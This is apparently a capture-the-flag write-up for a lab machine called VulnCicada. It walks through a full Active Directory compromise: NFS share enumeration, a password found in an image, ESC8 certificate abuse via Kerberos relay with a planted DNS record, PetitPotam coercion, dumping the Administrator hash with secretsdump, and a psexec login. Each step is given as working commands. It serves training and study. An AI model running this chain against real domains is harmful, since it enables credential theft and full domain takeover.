VulnCicada

OVERVIEW

So we have given IP address of the machine so Let’s head to Nmap to scan this IP

ENUMERATION

So these are the ports open and domain and domain controller name Be sure to add these into /etc/hosts

So Port 2049 caught my eye which has nfs service opened so i quickly performed

showmount -e 10.129.234.48

It showed /profiles directory so let’s mount it using mount

mkdir /mnt/profiles
mount -t nfs 10.129.234.48:/profiles /mnt/profiles

After it gets mounted lets head to /mnt/profiles and enumerate further

We found 14 user directories in which only Administrator and Rosie.Powell has some files so let’s copy those two user directories to somewhere else to see the files more thoroughly

On Inspecting Administrator Directory we found

Let’s check out vacation.png and other files too

Doesn’t seemed to have any information nor in image or in other files , So let’s check Rosie.Powell user directory now

It also have an image named as marketing.png so let’s open the image and check out other files too

While other files didn’t gave any info the marketing.png image revealed a password like string Cicada123

EXPLOITATION

Now we have user and a password let’s try another services such as SMB, LDAP, WEB, RDP etc

On checking Website on port 80 we found nothing else then IIS Window Web Server and a non accessible /CertEnroll directory So Now Let’s move to Other Services.

We realized that SMB,NTLM has disabled so there is no other way rather then Kerberos authentication so let’s do that with the help of -k flag

nxc smb 10.129.234.48 -u Rosie.Powell -p Cicada123 -k

So we can see we can now do SMB assigning and can access shares So I saw a share named as CertEnroll which we saw during our web enumeration so as the name is it suggest towards ADCS (Active Directory Certificate Services) so Let’s run Certipy to see any vulnerable templates are there or not.

First Let’s grab the ticket of Rosie.Powell user so that Kerberos authentication will be easier in future For this we can use impacket-GetTGT

Now lets run Certipy but before that change your /etc/krb5.conf file to the following one because we are using Kerberos authentication so its good to change it to avoid any issues

[libdefaults]
    default_realm = CICADA.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    CICADA.VL = {
        kdc = 10.129.234.48
        admin_server = 10.129.234.48
    }

[domain_realm]
    .cicada.vl = CICADA.VL
    cicada.vl = CICADA.VL

certipy find -vulnerable -u Rosie.Powell@cicada.vl -dc-ip 10.129.234.48 -dc-host DC-JPQ225.cicada.vl -k -no-pass -stdout

NOTE: If you are running Certipy in virtual environment then you have to check the ticket using klist to ensure the ticket is there if it says no valid ticket then export the ticket again inside the virtual environment

Here we go we found out ESC8 Vulnerability as Web Enrollment is enabled over HTTP

So what is ESC8 Let’s see something about it

ESC8 – NTLM Relay on AD CS Web Enrolment

ESC8 is one of the most frequently encountered exploitation scenarios in internal auditing. It presents a particularly high risk because it can be exploited without any domain account, making it a prime target for an external attacker who already has a favorable network position. The central condition for this attack is the presence of the Enrollment web service enabled on the AD CS server. This service allows a client to submit a certificate request via a web interface, typically accessible via the URL http://<server_name>/certsrv. If this service is enabled and poorly secured, it becomes possible to relay NTLM authentication from another host (such as a domain controller) to the CA server.

Now Since NTML is not enabled and NTLM self relay is also not enabled Let’s use Kerberos Relaying Over SMB to exploit this

Let’s Study about it using this blog BLOG
We discover that we can relay Kerberos over SMB using a specific DNS entry.

First of all, we need to add the magic DNS entry and make it point back to our machine. So we will use bloodyAD for this

bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA YOUR_IP

After you added the DNS entry then we can setup a relay using Certipy once again (Ensures you use latest Certipy which have -relay argument) you can use the above Certipy which I gave earlier

certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController

Finally, we can use nxc to coerce the remote machine to authenticate back to us using Kerberos using PetitPotam method.

So in another terminal do

nxc smb DC-JPQ225.cicada.vl  -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam

Let’s observe the output in our relaying terminal

As you can see we got the certificate and don’t worry if it fails try again the Certipy command on both sides as shown above you will get it

NOTE: If you are getting Attributes error that yours is 0 and it should be between 1 and 64 then you are either using outdated Certipy or using kali packaged Certipy(certipy-ad) so i recommend to use the above Certipy in virtual environment like me to avoid this error

Now we got the certificate let’s use that to get Domain Controller NTLM hash

certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48

Now we have the NTLM hash of the machine account. Since NTLM authentication is disabled, can use the ccache file and dump the hashes of the Administrator user.

export KRB5CCNAME=dc-jpq225.ccache

secretsdump.py -k -no-pass dc-jpq225.cicada.vl -just-dc-user Administrator

Here We GO!!

FLAGS

We got Administrator Hash Now Let’s outside virtual environment let’s grab Administrator TGT and use it to login or you can directly login without TGT and ccache also

getTGT.py cicada.vl/Administrator -hashes :hash
export KRB5CCNAME=Administrator.ccache
impacket-psexec cicada.vl/administrator@DC-JPQ225.cicada.vl -k -hashes :hash